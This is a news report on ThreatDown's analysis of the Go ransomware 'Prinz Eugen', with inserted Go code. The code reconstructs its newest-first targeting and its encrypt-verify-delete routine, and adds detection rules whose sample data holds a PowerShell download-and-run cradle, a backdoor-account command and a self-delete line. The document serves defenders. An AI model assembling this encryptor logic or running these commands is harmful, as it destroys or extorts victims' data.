New Go ransomware Prinz Eugen hits newest files first
Tue, 23rd Jun 2026
ThreatDown has published research on a new Go-based ransomware family called Prinz Eugen. The researchers linked the malware to a known extortionist through a password string used for a backdoor account created during the attack.
The analysis describes malware that encrypts files, targets recently modified data first and removes traces of its activity after execution. The sample, observed in a customer environment, was built to confirm that each file had been encrypted before its original was deleted.
How it works
According to the research, the ransomware is delivered as an executable called servertool.exe and appears to have been deployed after attackers gained access through compromised Remote Desktop Protocol credentials. In the case examined, the program was downloaded through Chrome, moved into the user's Music folder and then launched against selected directories.
Written in Go, the malware encrypts recursively across folders with no depth limit. The sample analysed had no configured exclusions, meaning it would encrypt every file that did not already carry the .prinzeugen extension and was not one of the temporary working files it creates during encryption.
A notable feature is the order in which it processes data. Rather than working through files in alphabetical order, Prinz Eugen encrypts the most recently modified files first. That can include active databases, current documents and fresh email archives that may not yet have been backed up.
This approach increases pressure on victims by hitting the newest and often most operationally important data first. The ransomware falls back to alphabetical sorting only when files share the same modification time.
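The ordering policy described above, reconstructed as an added Go example (the editor's illustration, not ThreatDown's code or the malware's): it walks a directory tree with no depth limit, skips files that already carry the .prinzeugen extension and, as an assumption, in-progress copies with a .tmp suffix, then sorts newest-first and falls back to path order only when two files share a modification time. The sample files and their timestamps are constructed.

```go
package main

import (
	"fmt"
	"io/fs"
	"os"
	"path/filepath"
	"sort"
	"time"
)

// The extension comes from the report; the ".tmp" suffix for in-progress copies
// is an assumption, since the report only says working files are skipped.
const encExt = ".prinzeugen"

type candidate struct {
	path    string
	modTime time.Time
}

// collect walks root with no depth limit, skips already-encrypted files and
// in-progress copies, and orders the rest newest-first; path order is used
// only as a tiebreak between files with identical modification times.
func collect(root string) ([]candidate, error) {
	var out []candidate
	err := filepath.WalkDir(root, func(p string, d fs.DirEntry, err error) error {
		if ext := filepath.Ext(p); err != nil || d.IsDir() || ext == encExt || ext == ".tmp" {
			return err
		}
		info, err := d.Info()
		if err == nil {
			out = append(out, candidate{p, info.ModTime()})
		}
		return err
	})
	sort.Slice(out, func(i, j int) bool {
		if !out[i].modTime.Equal(out[j].modTime) {
			return out[i].modTime.After(out[j].modTime)
		}
		return out[i].path < out[j].path
	})
	return out, err
}

// order returns the base names in the sequence an encryptor using this
// policy would process them.
func order(root string) ([]string, error) {
	cands, err := collect(root)
	names := make([]string, len(cands))
	for i, c := range cands {
		names[i] = filepath.Base(c.path)
	}
	return names, err
}

// buildSample writes constructed test files with controlled mtimes.
func buildSample(dir string) error {
	t0 := time.Unix(1780000000, 0)
	ages := map[string]time.Duration{ // name -> age in hours
		"sub/ledger.db": 0, "zeta.txt": 1, "alpha.txt": 1, "legacy.bak": 72, "done.txt" + encExt: 0,
	}
	for name, h := range ages {
		p, mt := filepath.Join(dir, name), t0.Add(-h*time.Hour)
		if err := os.MkdirAll(filepath.Dir(p), 0o700); err != nil {
			return err
		}
		if err := os.WriteFile(p, []byte("data for "+name), 0o600); err != nil {
			return err
		}
		if err := os.Chtimes(p, mt, mt); err != nil {
			return err
		}
	}
	return nil
}

func main() {
	dir, err := os.MkdirTemp("", "order-demo")
	if err != nil {
		panic(err)
	}
	defer os.RemoveAll(dir)
	if err := buildSample(dir); err != nil {
		panic(err)
	}
	fmt.Println(order(dir)) // [ledger.db alpha.txt zeta.txt legacy.bak] <nil>
}
```

The newest file (ledger.db, in a subdirectory) comes first regardless of where it sits in the tree; zeta.txt and alpha.txt share a timestamp, so alphabetical order decides between them; the already-encrypted done.txt.prinzeugen is never listed.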
The report also says the malware uses multiple worker routines, one per CPU, to process encryption in parallel. For each file, it creates an encrypted temporary copy, renames it to its final encrypted form and, if launched with a delete option, verifies that the encrypted version can be decrypted before erasing the original.
Researchers described this verification step as central to a scorched-earth design: the malware confirms that the target file is fully encrypted, and recoverable only by decrypting it, before it removes the source copy.
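The per-file workflow in the two paragraphs above, as an added example (the editor's reconstruction, not the malware's code): encrypt to a temporary copy, rename it to its final name, read the on-disk result back and decrypt it, and only then delete the original. AES-256-GCM, the nonce-prefix layout, the .tmp suffix and the throwaway key are assumptions; the per-CPU worker pool is not shown. The point for analysts is that the delete is gated on a successful readback, so a file that fails that check is left in place.

```go
package main

import (
	"bytes"
	"crypto/aes"
	"crypto/cipher"
	"crypto/rand"
	"fmt"
	"os"
	"path/filepath"
)

// The report gives the workflow and the extension, not the cipher or key size;
// AES-256-GCM with the nonce stored ahead of the ciphertext is assumed here.
const encExt = ".prinzeugen"

func newAEAD(key []byte) (cipher.AEAD, error) {
	block, err := aes.NewCipher(key)
	if err != nil {
		return nil, err
	}
	return cipher.NewGCM(block)
}

// verify reads the encrypted file back from disk and checks that it decrypts
// to exactly the original bytes; this is the check that gates deletion.
func verify(aead cipher.AEAD, encPath string, plain []byte) error {
	got, err := os.ReadFile(encPath)
	if err != nil {
		return err
	}
	ns := aead.NonceSize()
	if len(got) < ns {
		return fmt.Errorf("%s: truncated", encPath)
	}
	back, err := aead.Open(nil, got[:ns], got[ns:], nil)
	if err != nil || !bytes.Equal(back, plain) {
		return fmt.Errorf("%s: does not decrypt to the original", encPath)
	}
	return nil
}

// sealFile writes an encrypted temp copy, renames it to its final name and,
// if del is set, removes the original only after verify succeeds. It returns
// the path of the encrypted file.
func sealFile(aead cipher.AEAD, path string, del bool) (string, error) {
	plain, err := os.ReadFile(path)
	if err != nil {
		return "", err
	}
	nonce := make([]byte, aead.NonceSize())
	if _, err := rand.Read(nonce); err != nil {
		return "", err
	}
	tmp, final := path+".tmp", path+encExt
	if err := os.WriteFile(tmp, aead.Seal(nonce, nonce, plain, nil), 0o600); err != nil {
		return "", err
	}
	if err := os.Rename(tmp, final); err != nil {
		return "", err
	}
	if !del {
		return final, nil // original left in place without the delete option
	}
	if err := verify(aead, final, plain); err != nil {
		return final, err // verification failed: the original is kept
	}
	return final, os.Remove(path)
}

func main() {
	dir, err := os.MkdirTemp("", "seal-demo")
	if err != nil {
		panic(err)
	}
	defer os.RemoveAll(dir)
	src := filepath.Join(dir, "ledger.db")
	if err := os.WriteFile(src, []byte("constructed sample content"), 0o600); err != nil {
		panic(err)
	}
	key := make([]byte, 32)
	if _, err := rand.Read(key); err != nil { // throwaway key for the demo
		panic(err)
	}
	aead, err := newAEAD(key)
	if err != nil {
		panic(err)
	}
	final, err := sealFile(aead, src, true)
	_, statErr := os.Stat(src)
	fmt.Println(final, err, os.IsNotExist(statErr)) // original gone only if verify passed
}
```

Because verify authenticates the stored ciphertext with the GCM tag, any corruption of the on-disk copy (a flipped byte, a truncated write) makes it fail and the original survives; run it against a tampered .prinzeugen file to see the failure path.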
No ransom note
Unlike many ransomware families, Prinz Eugen does not place a ransom note on the victim's system. The sample contained no code to write a text file, HTML page or similar demand to disk.
Instead, extortion appears to take place through direct email, phone contact and hidden online portals. Researchers said that approach reduces artefacts on compromised machines and makes the extortion stage harder to detect automatically.
Before exiting, the binary also attempts to frustrate investigators. It zeroes the hardcoded encryption key in memory, triggers garbage collection and then deletes itself using a command shell routine designed to wait briefly before removing the executable from disk. Zeroing a buffer in a garbage-collected language does not guarantee that every copy of the key has left memory, so a memory capture taken before the process exits may still recover it.
Attribution trail
The strongest attribution clue came from a backdoor account created during the intrusion. ThreatDown observed the command net user admin germania /add, which creates a local account named admin with the password germania, and said that password string matched an extortion alias previously used by a dark-web actor known as ROOTBOY.
Researchers said that link ties the malware to an established data seller and extortionist whose activity predates Prinz Eugen. Public reporting and leak-site tracking cited in the research also associate ROOTBOY with the campaign linked to the malware.
The report says the same actor history includes earlier posts under the handle avtokz and references to GERMANIA in prior extortion attempts. ThreatDown argued that the reuse of naming conventions and identifiers provides the clearest public link between the ransomware sample and a known operator.
There are still caveats around attribution. ThreatDown noted that leak-site tracking has described ROOTBOY as an affiliate, which may suggest more than one person was involved, while the custom Go encryptor may also point to a separate developer.
Victims and infrastructure
The research links Prinz Eugen to attacks across several countries and sectors, with no single industry focus. The earliest public report cited in the analysis involved a leak portal used to extort Standard Bank Group in South Africa, while another named victim was Transitions Pro Centre Val de Loire in France.
ThreatDown said the broader model appears to combine data theft, encryption and direct pressure through leak sites and personal contact. In the Standard Bank case cited in the report, the attackers were said to have spent about three weeks inside the environment before exfiltrating data and escalating leaks after a payment demand was refused.
In the customer environment ThreatDown investigated, the attackers also used the RemotePC remote management tool to launch PowerShell stagers and deploy more payloads from an external IP address that was online at the time. ThreatDown suspects that host was being used as command-and-control infrastructure and that the additional payloads were likely remote access trojans used for information theft and exfiltration.
DNS and scanning history reviewed by the researchers showed a small cluster of associated domains, including a Standard Bank typosquat and domains containing the German word Festung. The operators appeared to dismantle parts of that infrastructure after operations, removing DNS records and stripping services from the exposed host.
Defensive signs
The research also lists behaviour defenders can monitor: creation of an admin account with the password germania, RemotePC being used to launch PowerShell, files carrying the .prinzeugen extension, the CHV1 file header and the self-delete command used to erase the ransomware binary.
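The indicators listed above, turned into an added detection example in Go over constructed telemetry (the editor's code, not ThreatDown's detection logic). Assumptions: RemotePC's process name contains "remotepc", the CHV1 header is the literal ASCII bytes at offset 0, and the self-delete is any cmd.exe child that deletes its own parent's image; the ping delay in the sample command line is a constructed stand-in for the brief wait the report describes, and the account name is not fixed, since only the password string is the indicator.

```go
package main

import (
	"bytes"
	"fmt"
	"path/filepath"
	"regexp"
	"strings"
)

// Event is a simplified endpoint telemetry record, constructed for this example.
type Event struct {
	Kind    string // "process" or "file"
	Parent  string // parent image path (process events)
	Image   string // image path of the process that ran, or that wrote the file
	CmdLine string // command line (process events)
	Path    string // file path (file events)
	Header  []byte // first bytes of the file (file events)
}

// The rule keys on the password string and the /add switch; the account
// name (admin in the case seen) is left free.
var netUserGermania = regexp.MustCompile(`(?i)\bnet1?(?:\.exe)?\s+user\s+\S+\s+germania\s+/add\b`)

// base lowercases the file name of a Windows or POSIX path so the logic works
// regardless of the host the detection runs on.
func base(p string) string {
	return strings.ToLower(filepath.Base(strings.ReplaceAll(p, `\`, "/")))
}

// selfDelete reports a cmd.exe command line that deletes its parent's own
// executable. The exact wait idiom is not on the page, so only the "del" of
// the parent image is matched, whatever delay precedes it.
func selfDelete(parent, cmdLine string) bool {
	lc := strings.ToLower(cmdLine)
	return strings.Contains(lc, "del ") && strings.Contains(lc, strings.ToLower(parent))
}

// Detect returns one finding per indicator from the report's defensive signs.
func Detect(events []Event) []string {
	var findings []string
	for _, e := range events {
		switch e.Kind {
		case "process":
			if netUserGermania.MatchString(e.CmdLine) {
				findings = append(findings, "backdoor account: "+e.CmdLine)
			}
			// Assumed process name: the report names the tool, not its binary.
			if strings.Contains(base(e.Parent), "remotepc") && base(e.Image) == "powershell.exe" {
				findings = append(findings, "RemotePC launched PowerShell: "+e.CmdLine)
			}
			if base(e.Image) == "cmd.exe" && selfDelete(e.Parent, e.CmdLine) {
				findings = append(findings, "self-delete of "+e.Parent)
			}
		case "file":
			// CHV1 is assumed to be the literal ASCII bytes at offset 0.
			if strings.EqualFold(filepath.Ext(e.Path), ".prinzeugen") || bytes.HasPrefix(e.Header, []byte("CHV1")) {
				findings = append(findings, "encrypted file artefact: "+e.Path)
			}
		}
	}
	return findings
}

// sampleEvents is constructed telemetry: four events that should fire and two that should not.
func sampleEvents() []Event {
	return []Event{
		{Kind: "process", Parent: `C:\Windows\System32\cmd.exe`, Image: `C:\Windows\System32\net.exe`,
			CmdLine: `net user admin germania /add`},
		{Kind: "process", Parent: `C:\Program Files (x86)\RemotePC\RemotePCService.exe`,
			Image:   `C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe`,
			CmdLine: `powershell.exe -nop -w hidden -c "IEX (New-Object Net.WebClient).DownloadString('http://203.0.113.10/s.ps1')"`},
		{Kind: "process", Parent: `C:\Users\alice\Music\servertool.exe`, Image: `C:\Windows\System32\cmd.exe`,
			CmdLine: `cmd.exe /c ping 127.0.0.1 -n 3 > nul & del /f /q "C:\Users\alice\Music\servertool.exe"`},
		{Kind: "file", Image: `C:\Users\alice\Music\servertool.exe`, Path: `C:\Users\alice\Documents\ledger.db.prinzeugen`,
			Header: []byte("CHV1\x00\x00")},
		{Kind: "process", Parent: `C:\Windows\explorer.exe`, Image: `C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe`,
			CmdLine: `powershell.exe Get-Process`}, // benign: not launched by RemotePC
		{Kind: "process", Parent: `C:\Windows\System32\cmd.exe`, Image: `C:\Windows\System32\net.exe`,
			CmdLine: `net user bob Welcome1 /add`}, // account creation, but not this actor's password
	}
}

func main() {
	for _, f := range Detect(sampleEvents()) {
		fmt.Println(f)
	}
}
```

The two benign events show the intended precision: ordinary PowerShell use and an unrelated net user /add are not flagged by these rules, although account creation by a non-administrative tool is worth its own, separate alert.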
ThreatDown said its endpoint protection blocked the ransomware execution and its detection tools flagged both the suspicious account creation and the abuse of RemotePC for PowerShell staging. It identified the malware as Malware.Ransom.Agent.Generic.
"The core technical finding remains the same: Prinz Eugen is a new Go-based encryptor with deliberate file-targeting and anti-forensic behavior," the researchers said.